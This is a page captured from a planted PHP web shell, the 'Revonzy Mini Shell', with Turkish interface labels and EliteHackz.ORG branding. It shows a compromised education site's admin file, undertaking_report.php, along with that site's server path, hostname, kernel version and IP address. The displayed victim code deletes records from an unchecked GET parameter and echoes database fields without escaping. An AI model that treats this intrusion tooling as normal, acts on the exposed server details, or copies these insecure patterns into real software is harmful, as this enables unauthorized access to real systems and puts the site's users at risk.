Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/kpmim.org/admin/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/kpmim.org/admin/undertaking_report.php

<?php
	require_once("lib/functions.php");
	$db = new login_function();
	$flag = 0;
	$actual_image_name = "";
	$success_msg = 0;
	$semester = "";
	$succ_flag = 0;
	$semester_error = "";
	if(!isset($_SESSION['current_login_admin']))
	{
		header("Location:/admin/index.php");
	}
	if(isset($_SESSION['current_login_admin']))
	{
		$email	=	$_SESSION['current_login_admin'];
	}

	if(isset($_GET['delete_id']))
	{
		 $del_id	 =	$_GET['delete_id'];
		 $db->delete_undertaking_data($del_id);
		
		 $success_msg	=	2;
	}
?>
<?php
	require_once('header.php');
?>

        <div id="page-wrapper">
            <div class="row">
                <div class="col-lg-12">
                    <!--<a href="print-feedback-report.php" style="font-weight:bold;" target="_blank">Print Feedback Report</a>-->
                    <h1 class="page-header">Undertaking Form Report</h1>
					<?php
					if($succ_flag == 1)
					{
					?>
					<div class="alert alert-success">
					 Saved Successfully.
					</div>
					<?php
					}
					?>
					<?php
					if($success_msg == 2)
					{
					?>
					<div class="alert alert-danger">
					 Deleted Successfully.
					 </div>
					<?php
					}
					?>
					
                </div>
                
            </div>
            
            <div class="row">
                <div class="col-lg-12">
                    <div class="panel panel-default">
                        
                        <div class="panel-body">
                            <div class="row">
                               
							
                                     <div class="row">
                 <div class="col-lg-12">
                    <div class="panel panel-default">
                       
                        <!-- /.panel-heading -->
                        <div class="panel-body">
                            <div class="table-responsive">
                                <table class="table table-striped table-bordered table-hover">
                                    <thead>
                                        <tr>
                                            <th width="50">Sr. No</th>
											<th>Full Name</th>
                                            <th>Mobile Number</th>
                                            <th>Year to Admission</th>
                                            <th>Course Name</th>
                                            <th>Year</th>
                                            <th>Status</th>
                                            <th>Date</th>
                                            <th>Time</th>
                                            <th>Action</th>
                                        </tr>
                                    </thead>
                                    <tbody>
									<?php
									
										$report_details = $db->get_undertaking_form_report();
										if(!empty($report_details))
										{
											$counter =0;
											foreach($report_details as $record)
											{
                                                $id=$report_details[$counter][0];
                                                $full_name=$report_details[$counter][1];
                                                $mobile_no=$report_details[$counter][2];
                                                $addmision_of_year=$report_details[$counter][3];
                                                $other=$report_details[$counter][4];
                                                $status=$report_details[$counter][5];
                                                $undertaking_form_no=$report_details[$counter][6];
                                             
                                                $date=$report_details[$counter][7];
                                                $time=$report_details[$counter][8];
                                                  $year=$report_details[$counter][9];
									?>
                                        <tr>
                                            <td><?php echo $counter+1; ?></td>
											<td><?php echo $full_name; ?></td>
											<td><?php echo $mobile_no; ?></td>
											<td><?php echo $addmision_of_year; ?></td>
											<td><?php echo $other; ?></td>
												<td><?php echo $year; ?></td>
											<td><?php echo $status; ?></td>
											<td><?php echo $date; ?></td>
											<td><?php echo $time; ?></td>
											
											  <td><a href="undertaking_report.php?delete_id=<?php echo $id;?>" onclick="return confirm('Are you sure?');">Delete</a></td>
										</tr>
                                       <?php
										$counter ++;
											}
										}else
										{
										?>
										<td colspan="5">No Data Found...</td>
										<?php
										}
									   
									   
									   ?>
                                    </tbody>
                                </table>
                            </div>
                            <!-- /.table-responsive -->
                        </div>
                        <!-- /.panel-body -->
                    </div>
                    <!-- /.panel -->
                </div>
             
                <!-- /.col-lg-6 -->
            </div>
                                
                            </div>
                           
                        </div>
                        
                    </div>
                    
                </div>
              
            </div>
            
        </div>
       

    </div>
    

</body>

</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4